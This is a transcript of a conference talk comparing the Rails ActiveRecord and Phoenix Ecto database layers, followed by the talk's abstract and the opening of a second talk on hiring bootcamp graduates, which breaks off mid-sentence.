into the scope for conference and time. And I'm changing these together. So here is one of active record strong suits. It's one of these really nice kind of English style syntax. For conference, start starting after, not ending before. It reads real nicely. That's sort of a nice feature for readability and stuff. Active record, it looks nice. I've got, it has many users and I've got this scope for active users. And then on the user, I've got this active scope. So there's another little bit. And now I call this the controller for conference and time. So standard Ruby stuff here, standard Rails. And then in my view, I do this, parties.each. And for each party, I do parties.active users. And I display that list of parties and I display the users for each one. And kaboom! Oh, what happened? Oh, man, that does not look right, does it? So this is the N plus one problem. If you've done enough active record, you've probably run into this. And the reason it does that is because, well, I start with these parties and for each one, I'm calling.active users. And what is that? That's an active record relation, right? We all know that if we use active record. It's an active record relation and that thing has not been preloaded. So it's running a query each time it does that. So how do you fix that? Well, okay, and my scope for parties, topic and time, I have to add this preload in there. That is kind of, all of a sudden, my English looking my scopes, I've kind of added this like, we kind of preload thing in, right? So it's kind of polluted my nice English looking syntax with something a little more computer-y. I could move it, I guess. I could take it out of the model and put it in the controller, but realize here what I've done is I had a parties model, right? I had a scope active on users and now I've got this preload here on controller. I've got my query spread out across three files, don't I? It's only one SQL query, but it's spread out across three files. Now, this does look pretty nice, but that's a little, that can be tough to track if you're like looking for these queries in places. It's a trade-off. It's a trade-off in, it's hard to find the SQL in here, but it reads nice and reads like English and it's very convenient, it's very fast, easy, rapid to develop. I get the queries I want, which is good, but what happened here, right? From like sort of a higher level, why did this happen? ORMs are kind of this leaky abstraction. So if like SQL's a dog, right, I want to treat a dog nicely, I want to like treat, they don't feed a dog food, take it outside, right? But Ruby is sort of like this cat and object-oriented programming is sort of like this cat and you wish you could just treat it like a cat and feed a cat food, you know, and set out a litter box, but you know there's this dog underneath and you can't forget that there's a dog. So like to write good active records, to write good Rails, you can't forget about the SQL, you know, you have to know it's there and you kind of have to know SQL and you kind of have to do both. So you can't just use active record naively, right? You have to remember that there's a cat, a dog under that cat, you know, and that's called a leaky abstraction, that's the term of that, because you can't just use the abstraction without also understanding how it works. Which is why our active record are nice, like English looking syntax, starts to kind of get a little uglier when we try to make the SQL right, you know? So concerning object-oriented programming, Jo-Arm's strong said about objects, you wanted a banana but you got a gorilla holding the banana. So we're running this query, right, we're getting data, data's the banana. What we got is this active record model, which is an object, and it's got all this like behavior mixed in. That's kind of the gorilla, you know? And that can be difficult to reason about sometimes when you start passing these models all around, all over the place, and you've lost track of the queries, and you've got this thing that's a gorilla holding a banana, and you really want the banana, and you end up calling the gorilla, you know? So it's interesting. So as I said, we got the queries here. You could use a join instead and make it into one query. But there's another performance problem associated with that. We fixed our M plus one, didn't we? But I think there's still a performance problem here. And that is, in my opinion, well, the select star, because, you know, normally in these tables, we've got a lot of stuff on these tables, including our timestamps, for instance, which I'm not even displaying on the page, but I'm pulling them back anyway, aren't I? Even, I'm pulling back a lot of stuff that I don't need. And active record kind of encourages us. I call this problem seeing stars, right? Seeing stars is this indiscriminate use of ORMs that's where it's always select star. And we can fix this, you know, by adding a dot select, but then you've got that ugly active record stuff with like the strings because we have to alias our tables and all that stuff. It's easy to fix, but it's also easy to forget about. You know what I mean? It's a pretty common problem I've seen in a lot of big Rails products is just select star everywhere because people don't take the time to do selects. And if you realize also, part of those scopes, those scopes are supposed to be reusable, aren't they? But once you start reusing scopes, each scope, each time you reuse it, each time you reuse it, might have different columns selected. So you're reusing a scope in like from one model, but you're tacking on different select statements and other parts and that all of a sudden also becomes real. Hard to keep track of like what's querying what because you've got a query spread out across so many files. So just to sum it up like sort of the Rails active record philosophy here is that kind of favors English over SQL, right? We have extracted away the SQL, which is good for readability, good English. Rails active record reads really beautifully. We've got objects, not data. We've got gorillas with bananas. Domain models over relational models. So domain model, like it just means like we've got a class that represents something in life. So I had a party table, like a party is a real thing, a user is a real thing, a conference is a real thing, and our classes match those. Our classes match like real world entities, things that we actually have to think about in real life versus a relational model which is tables which is specific to the database, which is a more computer oriented thing, less of a real world thing. Rails is big on productivity. If you've been in the Rails community long enough, you've heard about the 15 minute blog, right? It allows you to develop things really, really, really fast which is if that's what you need, then that's a great feature. It's awesome. It's tough on scalability because it's so easy to do those N plus ones and forget because it's so easy to forget about the select. There are a few other performance related things that I'll talk about later. I kind of favor developers over DevOps. Why do I say that? Well, because a lot of times like your DevOps or your DBAs are looking at the query log and it's like, oh, wow, look at last night, this was the slowest query that ran. Look at this giant thing. Where's that query? The developers are like, oh, well, it's split across 12 scopes over four different models. I kind of all chain together. It makes it hard if you just want to find the slow query, right? Find that query. It's kind of tough to track it down sometimes. The SQL in Rails, like, are they really friends? I don't know. They're kind of frenemies for that reason, I think, just because it is hard to think in SQL and also think in Rails, you know? So this is what I see at scale when you get huge active record applications. A lot of people using these N plus ones, the seeing stars problem, app level constraints. Those are things like unique constraints in the model, which is this weird kind of anti-feature, I think, that it's not safe against race conditions. I see, you know, the way in active record, you can just, like, take a model and, like, dot save kind of everywhere you want. You know, it seems like people forget transactions a lot. It's lazy, right? You string this query together and you pass something off. You can pass it all the way to the view before you start looping through it before it actually runs the query. So it's hard to keep track of where the actual query is run. Where Java championed forcefully protecting programs from the cells, Ruby included a hanging rope in the welcome kit. This is DHH. And that's kind of true in Rails of active record, too. It allows you to get things done fast. But to its credit, great English-like readable DSLs. It's conceptually simple. It's comfortable for beginners. You know, it's kind of, if you're not really used to SQL, it's really easy to get started. So it's got these big thumbs up, you know, it's got its benefits, too. And overall, I'd say active record, this is my opinion kind of, but convenience over explicitness and performance. So it's real fast and easy and convenient to create, to kind of chain these scopes together. But that explicitness that like, here's what's actually happening, here's that SQL that's running, is lost a little bit. And it's easy to make performance mistakes. Explicitness, by the way, ding, ding, ding, that's our word of the day. I'm going to be saying this a lot today. So look out for this word. So let's move on to Ecto now. So Phoenix is not Rails, as Chris record. And Leah Chalade says, Rails of Phoenix or Web Perks to share a common goal. So they are and they aren't the same thing. They're very, very similar. If you're doing like, if you're doing like sort of like a crud app kind of thing, they are very, very similar. But then Ecto has, or Phoenix has this like superpower of real time communication. So if you're doing that, then they're very different, of course. But the way that Ecto works is it's a lot, it's a little different. So there's not just a simple model. There's a model file, but there's not a model class. It actually has four things, a repo, a schema, a change set, and a query. So already, it's conceptually a little more. There's more to think of, right? So here, for instance, is the first thing is the schema, right? So in the model file for party, it's got a model file, but not a model class. So first of all, you have to define the schema. We know that in ActiveRecord, you don't define the, you don't pre-define the fields, right? It's all dynamic. In Ecto, you actually have to define them. But you can see it's got has many and belongs to in the same kind of way. But it's explicit, right? So there's that word, explicit, because we're telling Ecto what fields we have, which allows us to do some, it turns out to be convenient. It's a little more boiler plate, but it turns out to be convenient. Here's our controller. So that first line is kind of weird. So for our index action, the connection, that has the, like the request and response and stuff. It's getting, it's passed in. It's not global, right? There, again, is that explicitness. That little funky thing with the brackets in the first line there, that's a, like a, it's a pattern matching. It's kind of destructuring, getting the conference ID out of the request hash. And then we have repo.all. So repo is this module that represents our database. And we're passing party.for conference, which is what gets our query. So it's kind of two pieces. So we've got a repo that represents our database. And then we're party.for conference, returns the query. And so then they get run. And then we're explicitly calling index.html and passing it the parties. So it looks kind of like Rails, but a little more explicit. And we've got kind of two parts to our query instead of one. We've got a repo and we've got this for conference, which returns a query. If you're big on, like, design patterns and stuff like this, this is called the repository pattern. It's Martin Fowler to find this in his, one of these, in his book here. Versus the active record pattern, an object that wraps a row in a database table or view. So active record pattern, like the original definition, kind of describes, like, the instance methods on active record. But active record, the Rails thing is actually sort of like a melange of, like, like the class methods are more like repository, where the instance methods are more like active record and their hints of data map are another things mixed in there. So well, active record is sort of this, like, meta pattern that's kind of grown over time to encompass more and more. The patterns in Ecto are a little more finite. I actually was lucky enough to be on the RubyRogues podcast and I've degrade him was on there. And we were talking about this and someone said, hey, will someone define active record and repository? And I went and defined him and I got it totally wrong. He was like, actually, Brad, that's the opposite of what they mean. So this is, so if Abdi's in here, this is for you, I wanted to show you that I got this right. But what's also interesting about Phoenix is that, well, it has no save method. And so you can't just, like, query something, change a field and hit save and, like, save it back. I'm going to get to writing in a second. But, and it doesn't return objects, it returns objects. So it's returning bananas, not gorillas. It's just returning data in this sort of struct that you throw around that doesn't have methods hanging off of it. And then it's immutable. Those structs come back, they're immutable. You can't, like, change them once they're there, they're there. Which means you have to, like, design your programs a lot different, differently. Interestingly, it returns structs, not objects, right? Which means it's not an object relational map or I'm a little bit embarrassed to say I didn't quite figure that out until after I had proposed this talk. The title is a tale of two ROMs, right? One's not actually an ORM. Whoops. But that's okay. They, they serve the same function. Okay. So here in the model, I, I need to put together a query, right? So here's my query for conference. I pass in a conference ID and I've got this cool syntax from party and party. So I'm getting a little alias there. We're party.conference ID. And then also check out, check out the select. Select party.name, party.startTime, party.endTime. What's, what's kind of cool is if you get in your mind, well, for one thing, this really looks like SQL, doesn't it? The select's on the bottom instead of the top. But it looks, it looks really SQL-esque, doesn't it? It's almost like, it's almost like SQL written in Elixir, which is like kind of cool. And then also the select syntax is really nice, much prettier than the Rails one. And if you get in the habit of always putting that in like you're writing a query, it's, it's, you're not going to forget it as easily and, and have the seeing stars problem, are you? If we want to preload, like, users, we can, just like that. It's still pretty SQL-esque looking. If you want to group by, I thought this was kind of cool. We have that group by, oh, that's just the user ID, sorry. But then select party.id and count of user.id. I thought that was kind of cool. Real SQL looking. Maps real nice. Does anyone know where they got this syntax from? Actually, this idea of this kind of like SQL looking syntax inside the code. It actually came from C sharp.net,.net MVC. It's, it's a rare case of like an open source world taking a cool idea from Microsoft, right? Instead of the other way around, instead of vice versa. Yeah, feels like, yeah. Yeah, nice, nice dance moves, Bill. Where'd you learn that? Yeah, we're still mad about IE6, you know. So in the end, I take all these queries and I sort of put them together all in the same file. Realize those are the ones I just showed you, but you know, there they are and it's kind of like a bunch of SQL queries. Now, you can write this in a way that kind of composes them and reuses them, but it's not very dry because they all three have the same wear condition. In an active record, you would make a scope and you'd reuse it. It'd be more dry. Here, we're repeating more stuff and this is a little bit more of my own opinion than something forced on you by, by Ecto, but there is some merit to that, right? Because, you know, it's real easy to track down those queries. It's real easy to find them, you know, when you look in your query log. You know, here's the one that, that locked this table last night. It's real easy to go back and look at them. You know, it's real easy to imagine this, to go from Ecto back to SQL and back again without sort of getting lost in all these model chaining, all these scopes together. So, also, so like if I ran this in the, Phoenix has a console like Rails, so if I run this in the Phoenix console, I get parties, I get all the parties, right? And then I get the first one, notice list.first of parties, that's a, we're functions, not methods, right? It's not parties.first. It's list.first.parties. It's a function and I do first party.users. I get this association not loaded. In, in, in ActiveRecord, this would be an ActiveRecord relation and it would actually load it, wouldn't it? It would actually run another query. You can't do that in Ecto. You can't do it. That's a null object that, that, it, for one thing, this is immutable, so it can't just load the new stuff in. It can't run another query and load stuff into that object because it's an immutable object anyway. But this solves the N plus one problem. You cannot do it. It's impossible to write an N plus one in Ecto. Now, that means you have to sort of go back to the model error and think ahead and write your preload back down there but, you know, which is a little more boilerplate and a little less dry but that might be a good thing. It's, it's, it's eager too. It's not lazy. So all the querying is actually done in the model error, you know. There's not that sort of laziness where you're passing this ActiveRecord thing all the way up to the view or God forbid the view helper and then like running it in a loop and then firing off a query, you know. I've seen big Rails projects where it's like, okay, I'm going to look at the queries this, this, this request runs. Oh my gosh. There's one in the model, one in the controller, one in the view and one in the helper. Oh boy. This sort of forces it all to be at the model error and you're forced to think ahead of all your preloads and stuff. It's not going to like randomly fire one off in the view. So now onto writing, right? When you write whether that's an update or an insert, we've got these things in Ecto called change sets. So here's a change set like for creating a new users, right? I know that I define this change set. I'm going to, it's going to take the name, the email address and the age. Cool. So that might be like your form that, you know, your, your sign up form, for instance. Okay. And this is what it looks like. That funky little arrow thingy that's called a pipeline operator. It's kind of like a Linux pipe. It's an Elixir thing. But look closely at this. First of all, there's actually like explicitly casting, right? Rails automatically casts. Ecto explicitly casts. And it's got required an optional params. We explicitly do the validations right here on this method and then we tell Ecto that there's a unique constraint on email. So that's one change set for like your sign up form. If we want one for like update, say you just update someone's email, we have to make another change set. We don't share the change set. So the top one is an insert operation. The second one is an update operation, two completely separate change sets. So contrast that, for instance, with an active model, an active record model. You know, you can kind of just like freeform it, like set a property and hit that save or set a couple properties and hit that save. You know, you can't do that here. It's like you have to explicitly define each write operation. This one's an update and it looks like this. It has these validations. This one's an insert. It looks like this. It has these validations, which is more explicit. There's that word again, right? Ding, ding, ding. Explicit. And also you can allow these to have separate validations. So you don't end up with a lot of like convoluted if statements on your validations and stuff. A little more boilerplate to set all this up, a little more work. But increased expliciteness, increased flexibility and having multiple different sets of validations and things like that. So definitely a different approach. And it has this cool concept called a multi, where a multi is basically a bunch of ups, inserts or updates. So here we've got three. I've got a topic insert, a party insert, an update conference. And then you kind of wrap these in this transaction and you can get the, you can pattern match on the result, okay, or pair and handle the result as a whole, right? This is kind of cool because if you get in the habit of using these, so like every time I have a post, I'm going to do my writes in a multi, then you never forget to wrap that in that transaction. Very common mistake I see in big Rails apps is the saves are kind of scattered all over the place and it's real hard to sort of wrap them all in one transaction or people just forget to wrap them in a transaction. This kind of helps you with that. And it's a little cleaner too. In Rails, you'd have to do like if topic.save and party.save and conference.save, here you just kind of create this multi and you save it and you get either an okay or an error. So you're thinking transactions now instead of models and domain models, right? You're thinking in terms of, this is a single database transaction. So yeah, separate validations, a little more explicit, better security also, we're not, we don't have to deal with, we don't have to worry about the problem of strong params. You know, there's less text passing around, so less opportunity for SQL injection because it's got a better query syntax really. And again, explicitness. Functional programming is about making the complex part of your program explicit. In most web apps, the complex part, you know, is a lot of this database querying and how you're sort of translating from that user input and like shaping the data and getting it into the program or how you're taking that relational data, querying it, mixing and matching, turning it around, reshaping it and passing it out to the view. So Elixir makes that a little more explicit, right? A little easier to track down and figure what's going on, like at a slightly lower level, at not high, as high of an abstraction level. So also if you're big into big terms, Ecto follows the command query responsibility segregation principle, which is that read and update use two different models. And we saw that. The queries I had had joins in them, right? But the updates have these explicit change sets. It's not like one model for reading and writing. It's a separate thing, a query for reading and a change set for writing. So that's conceptually interesting, but it's also, there's also kind of like right at the database level kind of a real compelling reason to do that. Think about a query, you know, in anything non-trivial, a query is going to have joins. A query, most queries like in any, in big complex apps have a lot of joins. And when you get that, you get back a certain set of columns that does not match what's actually on the table. You're getting back columns from multiple tables. So your queries have a certain set of columns based on what joins they have, but your writes don't have joins, do they? The writes always write only to a single table at a time, an insert. An insert only inserts into a single table. An update only updates a single table, but your reads read from multiple tables. Yet, for instance, in Rails, they're sharing the same model. The fact, even though they're pulling back different data, different sets of properties, they're sharing the same model, we have that responsibility segregation here in Ecto. So they read and update using totally different paradigms, totally different sets of columns, totally different, you know what I'm trying to say. So just to kind of like sum up, Rails has objects, Phoenix has data, right? It's gorillas of bananas versus bananas. Rails has methods, whereas Phoenix has functions. And then Rails stuff is mutable. You can pull back an object, change a property, pass it around, do whatever you want with it. Phoenix is immutable. Once you query that data, you've got that struct. It doesn't matter. On the SQL level, or I guess at the ORM level, Phoenix or Ecto, right, it favors SQL style syntax over English style syntax. It looks more like SQL. It feels more like a relational database. Overseeing stars, I won't say it solves that problem. It definitely doesn't. But I feel like with that kind of cool select syntax and the way it kind of, you know, it looks like SQL, you have that query. I feel like it makes it a little easier to remember, not to just indiscriminately select star every time, which, you know, if you're not at scale, it may not matter. But at big scale, when you've got, you know, dozens of web servers firing on a single database server, the database server becomes your bottleneck. And those select stars are a performance killer. Rails is lazy. Ecto is eager. All those queries kind of fire when you'd expect them to. You know, we're not passing these lazy objects off to the views where the SQL then gets fired from the view. Rails is dispersed. The query gets spread around across scopes, across multiple files. Where in Ecto, it's more confined. It's all in that model layer. So what's the downside of this? Well, it is more boilerplate. We have to set up all those change sets. We have to define our schema. We have to create those multis and stuff. There's more typing involved. You know, you're going to end up with more code to kind of set that stuff up. It's a little bit more complex of a mental model because, you know, in the world of ActiveRecord, we've got domain models. Oh, I've got a user. That's a real life thing. I've got a user class. You know, a nice easy connection there to think about. Whereas this is more complex. That command query responsibility segregation means I've got to think about this differently when I read than I do when I write. It's less dry. We've got more repeated code because we're reusing it less. A little less readable. That depends what you're used to, you know. If you want code that looks like English, you know, if that's what you're used to and that's how you like to code, then it probably will be less readable. If you're used to SQL and doing things of this, you know, and writing queries, then, you know, you may have the opposite experience. It may be a little more readable. It's like, it's kind of like robot talk, you know, instead of like users and conferences, we've got change sets and schemas and queries. But that might be more natural if you're used to like talking in computer terms. I like talking in SQL, for instance, my wife's like, Brad, will you do the dishes? I'm like select dishes from sync in certain to dishwashers. She's like, what are you saying, Brad? I'm like, oh, sorry, sweetie, I was talking SQL. She's like, you are so weird. But then, right, so we get, I guess the tradeoff here is sort of the opposite. We've got like, it's explicitness, there's that word, right? It's explicit what we're doing. Performance, there are, I won't say it's better performance. I'm saying there are few caveats, right? Fewer pitfalls that you can fall into. You still have to be mindful, of course, but there are fewer pitfalls you can fall into for performance. You can't do M plus ones, you know? Over convenience, it's not quite as fast to develop. I wouldn't want to do the 15 minute blog in Phoenix, but you know, I bet you could do it 30, you know? So it's just a different set of tradeoffs. And that's really what this is about, is that neither of them are better or worse. It's just a different set of tradeoffs you get with these different designs. Also, part of the actual philosophy is just to sort of like, let the database do what it's good at, you know? It adds constraints by default in your migration. If you set up a foreign key with references, you get that constraint by default, you know? It does not have polymorphic associations like Rails, which if you come from the world of SQL like I did before, getting to ActiveRecord, yeah, that is just so weird. I don't know where that pattern came from. It does not have these app level unique validations, you know? Like so Active, if you want a unique validation, you put it on the database. It doesn't have that like application level one where you can do unique validation in Rails. That one is weird. It runs a select query first before doing the insert. It's not safe for race conditions. So you can't do that. And it's kind of clever like Ecto has some neat ways. The downside of relying on the database is that the error message is uglier, but Ecto has some neat ways around that. I don't know if you remember, but in the change set, I defined unique constraint on email. When it gets like a unique constraint failure, it says, oh, which one is the unique column? Oh, it's email. Let me generate a nice error message for you. So it's really clever. And then there's the testing story, you know? I don't have any slides, you know, about the testing code, but believe me, the testing ends up being easier when you've got this more explicit model when you're passing just data around between your functions. You tend to do less mocking because your business logic is not sort of like mixed into the model. You're not sort of like blending together business logic. So like say you have this financial app, you might have like calculate, interest rate or something. That's not in the model. It's a function and you're taking the data, running the query, taking that data, passing it into that function, getting a result back. Well, that function then becomes really easy to unit test. It's a pure function. That's one of the benefits of functional programming. So just sort of the way you're forced into this paradigm, a slightly stricter paradigm with Ecto, you end up with more pure functions. You end up with less stubs and mocks, which is really nice. Also because this runs on Erlang VM, the test runs are massively concurrent. You fire off like the test suite and it starts up like 30 at a time, like in parallel, which is really awesome. It does have cool, cool more features like so JSON B, that's that thing in Postgres where you can save JSON in Postgres and query against it. It's got support for that in a real slick way and they say there's a Mongo adapter coming, which is kind of cool. You can also take Ecto and like supply your own adapter for it. So someone like, someone found a way to write an adapter that hits the GitHub API. So it's Ecto, but instead of reading from a database, it's hitting the GitHub API and you get that same SQL type query. That's kind of cool. If you wanted to like swap out a database implementation with an API implementation or vice versa, you get that same, you don't have to change any of your app level code, which is kind of cool. That's kind of neat. But in the end of this, realize that ORMs are a choice that you get trade offs with each one and one size does not fit all. So obviously I think I've shown, this is completely unbiased, right? I see these frameworks as, no, I like to act away, but that may not be for you and that's okay if you value the kind of convenience that it gives, then this will be it. And also realize you have a choice, even if you're stuck with Ruby, you know, there's another gem up there called SQL, which has some similarities with Active Record, but with also a different set of trade offs, you know. It doesn't have the N plus, I don't think, it has the N plus one thing, you know. So it's, you can, you can swap this out in your Rails app, use the ORM of your choice. Trailblazers, another one, which it actually uses Active Record, but it's got like a application architecture on top of that, including something that looks a lot like Ectos change sets. So, you know, again, different trade offs if you want to use this. You can also use Active Record in a way that looks more like, you know, some of these other design patterns, more like Ecto if you want to, maybe by adding a service object or something, or you may just use Active Record as it is, just realize that, you know, just because you're using Rails doesn't mean you're forced into the Active Record way necessarily. So a few resources here, a couple great articles. This bike shed podcast with Jose Valem is awesome, that's really, really good. If you're interested more in immutability and those, immutable data structures, those persistent data structures, this is changing the unchangeable, that's a talk I gave at RubyConf, which explains not just why, but how those things work. And then if you're interested more in like services, and how you can like change the way you use Active Record, I also gave a talk there at Amitabh and Santa Barbara, which is, and there's a link to that one for you. If you're more interested in Phoenix, check out Friday, Brian Cardella, he's the CEO of Dockyard, he's giving a talk just on Phoenix. I haven't seen it yet, but I'm betting it's pretty good. So check out that one on Friday. Who am I? My name is Brad Urani, I tweet at Brad Urani, follow me, follow you back, I'm really a Twitter addict. Connect with me on LinkedIn, I've got this blog, I don't update it very much. I've worked at Santa Barbara at Procore. Procore makes construction management software, it's an incredible place to work. This is the view from our office, you can whale watch while you program. It is one of the coolest places to work, it's the coolest place I've ever worked. I moved all the way from St. Louis, Missouri to Santa Barbara just to work there. We're hiring like crazy, Rails Architects, JavaScript front end, which is React and Redux, pretty much every cool thing you could think of. I'd love to talk to you about that if you're interested or there are also about 15 of us here mostly wearing Procore gear, so come and talk to any of us. Finally, HallwayTrack, the app is live, if you would like to use it, right, to get together with your fellow programmers here and set up a little HallwayTrack meeting, it's really raw, but it does work. You do have to wait for that Heroku spin up time when you load it the first time, so be patient. But it is live and it does work. Any questions? Oh, you mean the double incarnate? Yeah, those don't exist in Ecto. You asked about callbacks. Do callbacks exist in Ecto? No, I don't think they do. If they did, I didn't go looking for them. There are other ways to solve that problem, right? You might put a service layer or do it in the controller where you run everything in that, I showed you that multi where you're kind of doing all the rights in one multi. You just use the controller or a service layer to kind of put stuff in a multi and run it all at once. Cool, thank you very much.
|
They bridge your application and your database. They're object-relational mappers, and no two are alike. Join us as we compare ActiveRecord from Rails with Ecto from Phoenix, a web framework for Elixir. Comparing the same app implemented in both, we'll see why even with two different web frameworks in two different programming languages, it's the differing ORM designs that most affect the result. This tale of compromises and tradeoffs, where no abstraction is perfect, will teach you how to pick the right ORM for your next project, and how to make the best of the one you already use.
|
10.5446/31497 (DOI)
|
I think we'll go ahead and get started. I know folks can catch them up. Still okay, sound-wise? A little louder? How's that? Better? Projecting? Cool, so that's good. And I did turn off flux. Excellent. All right, so first, yes, flux is off. Second, thanks so much for coming. I really appreciate you all taking the time to come and see me talk. Thank you to RailsConf for agreeing to let me talk. Thanks so much to Kansas City for hosting all of us. So yeah. Yeah, some applause for Kansas City. All right. Excellent. Cool. So hello. Hi. I figure this is a computer talk, so we have to start with zero, right? So part zero. Thanks. I tend to speak really quickly. So if I start going way too fast, I talk fast when I'm excited. I get excited talking about Ruby and about hiring and about boot camps and about all this stuff. So if I start to go way too fast, just something, just like wave your arms or maybe dial it back, some kind of large gesture that I'm likely to see to sort of slow me down and help you guys follow along. I'm going to talk for about 30 minutes, maybe a tiny bit more. We'll have about 10 minutes at the end for questions. I'm going to try not to just plow through this talk. It's funny, a little bit ago I did a talk on Ruby Garbage Collection, and I felt good about the talk and I practiced it and I was in a good spot. Then right before I started, Matt's came in and sat down in front row center, so I got to teach Matt's about Ruby Garbage Collection, also half through the Ruby Core team. So I did this talk pretending that all of you would be Matt's or practiced it rather, and it seems that none of you is. So I hope I'm in a good spot and that, like I said, that I would just kind of truck through this talk. So I'd ask you just to stretch one arm. You can go ahead and just raise one arm. There's going to be a little bit of interaction. Not a lot. I know we hate that. So I'm going to ask you to other arm too, just in case you decide to switch it up. I'm just going to ask you to raise your hands at some point in the presentation, the show, and that's going to be the extent of the audience participation. So like I said, hello. My name is Eric Weinstein. I work at Hulu as a senior engineering lead. You can find me on GitHub, Twitter, et cetera, et cetera, in this human hash that I made. If you like Ruby, and I imagine you do, or you wouldn't be here, there's a book I wrote a little bit ago called Ruby Wizardry that teaches Ruby to eight, nine, 10, 11, 12-year-olds. It's available from NoStarch, so thank you also to NoStarch. They've gone ahead and given us 30% off coupon promo code. So anytime this week, go to NoStarch.com. If you do want to pick up a copy of Ruby Wizardry, physical or E, just use RailsConf 2016, and that will be 30% off. So again, thanks to NoStarch for that. So like I said, this talk is pretty quick, but I think it's still beneficial for us to sort of know where we're going. So this is a kind of quick overview of what we'll be talking about with the obligatory clickbait, right? So where are we going? You know, that one big mistake we keep making at one weird old tip, et cetera. There'll be kind of a survey of the field. We'll talk a little bit about different boot camp programs and sort of what they offer and what one learns in a boot camp. Really what we should be looking for when interviewing boot camp graduates. This fourth one is super important. I believe it's kind of like going to be the running theme of this talk. It's belief in improvement. If you don't believe that you can get better at math or programming or interviewing or ex skill through deliberate practice and dedication, you're not going to. So I think that believing in improvement and then promulgating that as part of our culture that we believe in improvement is huge. And finally we'll touch on kind of a holistic model for continued growth, right? We will talk about interviewing and then once we've got folks in the door how we help them continue to learn and to grow as part of the organization. So part one, we've cleared part zero. We're on the second part now. Part one, hiring, right? I think the crucial thing is we sort of lost the thread a little bit ago in terms of interviewing where we have confused the products for the process and I'll talk a little bit more about what I mean by that. But essentially what we're looking for, right, is when we want to hire someone, we want to say, hey, abstractly, whatever it is that you know how to do, are you good at that thing? Right? Whatever it is we're hiring for, whatever it is we need, are you good at doing that thing? And to some extent we've confused that with concretions, with ideas of what we think people should know and not generally stepping back and figuring out whether our needs are being met instead kind of like looking at this particular example and we'll talk more about it. And it's kind of steeped in interviewing tradition so we'll talk a bit about that as well. So we're on to the first arm exercise, right? I warned you about this. How many of you have attended a boot camp or something that could be described as a boot camp or a retreat or something like that? Cool. Or worked with someone. Or have hired someone. Or have had some kind of meaningful interaction with a boot camp. Okay, so a lot of you. Excellent. That's good. So this talk is kind of a lie. It's not entirely about boot camps. It is, in fact, kind of a larger talk about hiring generally and the sort of confusion in terms of hiring and growing generally. And it's sort of through the lens of boot camp programs, A, because they're very popular. It's sort of a trending topic in the community now. B, it just provides us focus to talk about a particular non-traditional route as opposed to kind of the abstract non-traditional background entirely. And well, see, I guess it's not even really a lie. It's more of a fit. It's about hiring and growing. Everyone, not just graduates of boot camp programs. Am I good on pace? Does this sound like a good relaxing excellent? Cool. I guess I'm going to try to dial this back just a tiny bit. So what is the traditional experience, right? I think it's computing science, which is not a typo. It turns out Dykstra called it computing science. And I sort of like that, because when we call the tradition computer science, it's sort of like we understand computers, right? And everybody knows that computers are actually tiny, non-deterministic boxes of feelings that do what they want. And no one actually really knows how they work. It's a deep mystery of the universe. So we, I think, should call it computing science, because really when someone majors in CS, they look at compiler design, they look at computation, they look at algorithms, data structures. There's some writing code sometimes. That's the thing that you sometimes do. But that's really what we're talking about when we talk about a traditional background. Four-year degree in computing science, learning things like graphs and trees, whiteboarding, a lot of whiteboarding. And then a language like Java or C++, right? A language that you would be taught in school, a language that is the sort of lingua franca, if you're looking at preparatory stuff like cracking the coding interview, things of that nature. And so this is that click-baity thing. I talked about this one big mistake that we've made. And like I said, somewhere along the way, we've sort of confused this abstraction. Are you good at this thing that you know how to do? Are you good at this thing that we need? But this concretion of, given that the thing you do is computing science, are you good at it? And we sort of punish people who aren't. Or we kind of snipe, look for weaknesses in people who are not good at computing science or have not studied computing science. Fundamentals are important. That's why they're fundamental. But there's something that we should really pay attention to when we're interviewing, which is, are we looking for someone who is really good at computing science or are we looking for something else? Because if we're looking for something else and we're hiring someone with that skill set while we're interviewing for someone who, and this is another theme in this room if you've been in here earlier today, is super good at red black trees, right? That is a different thing than most of what we do day-to-day, programming Ruby, programming Rails. And all we're going to do if we ask someone these kinds of questions who comes from boot camp or a non-traditional background and just make them feel bad that they don't know how to write a black, red black tree from memory. So these are, this is the survey of the field that I promised you. It's just the ones that I'm most familiar with. There's nearly 100 in North America alone, so I've just picked these six. These are ones that I know have Ruby and Rails in their curricula. So we've got Pap Academy, Dev Boot Camp, the Flatiron School, General Assembly, Hack Reactor, and Turing School. So we're going to talk a little bit about these programs generally and get a sense of what the curricula are, what's taught, and guide our interview process from there. Sort of an NB, I attended Hacker School three years ago, which is now called the Recurse Center. I don't know if it's really a boot camp in the traditional sense insofar as, you know, there's no curriculum. You can be doing Python for three months. You can be doing C++ for 20 years and be taking your open source vacation. You have all these 30-odd people, these hugely disparate backgrounds in a room, programming together for three months. It is a non-traditional route though, so I thought I'd mention it because we're about non-tradition in this talk. So what do we learn in boot camps? It's not computing science, not generally. We learn things like Ruby and Rails. The curricula do vary from camp to camp, but we can talk, I think, in meaningful generalities. So there's server-side stuff like Ruby and Rails. There's client work in JavaScript, of course, because we are cursed with JavaScript. It sort of depends on what framework. So some will teach Angular, some will teach React, but there's some JavaScript, there's some client-side component. This is a full-sac type of experience. So that also means that we learn software development tools and best practices. So deploying stuff on platforms as services like Heroku, using version control stuff like Git, making sure that we can deploy something end-to-end and sort of work as working programmers. And these programs do teach to the test, quote-unquote, they have to, right? You can't properly train someone for interviewing and say, hey, you're really good at this particular technology stack. You understand how to do all kinds of crazy Git bisecting things and resolving merge conflicts. And you can work in a professional environment, but you are going to have some trouble doing graph traversals on a whiteboard, and that's how you're going to be evaluated. So there is some of that. Though I would argue really what the meat of these projects and boot camps is, is learning how to function as working software engineers. So like I said, resolving Git conflicts, merge conflicts, working and deploying and tracking down weird bugs, things of that nature. A friend of mine kind of thinks of it as physicists versus carpenters, this notion that like the physicist will tell you, yeah, what you've designed, that building won't fall down. That seems reasonable. But there's all kinds of hands-on stuff, right? All kinds of physical acts of pulling software that you don't learn as an undergraduate studying computing science. And I think it really boils down to sort of knowing that and knowing how. And I think we need both in order to have a meaningful education in programming and software engineering. So these are some of the things. Given this one big mistake that we make, this confusion of are you good at this thing and are you good at computing science, these are the things that I look for when I'm interviewing anyone, but particularly boot camp graduates or folks with non-traditional backgrounds. So the ability to write a non-trivial program. And by non-trivial, I mean something that does something in the world where you have network access or file I.O. or API calls. It's not just fizzbuzz, it's not just balancing a tree. Oftentimes I like to use problems that sort of are boiled down from or reduced from real problems that we have at Hulu. So I work on the ad platform team. My team, their job is to write the software that the sales planners and the ad traffickers use to determine what ads are, how ad campaigns are rolled out. Whether you see the same ad four times in a row, I'm trying not to do that. If you have seen four Geico ads in a row, I'm sorry, please come see me after the show and we'll fix it. But having some kind of pair coding challenge where it's like, hey, we have one Geico 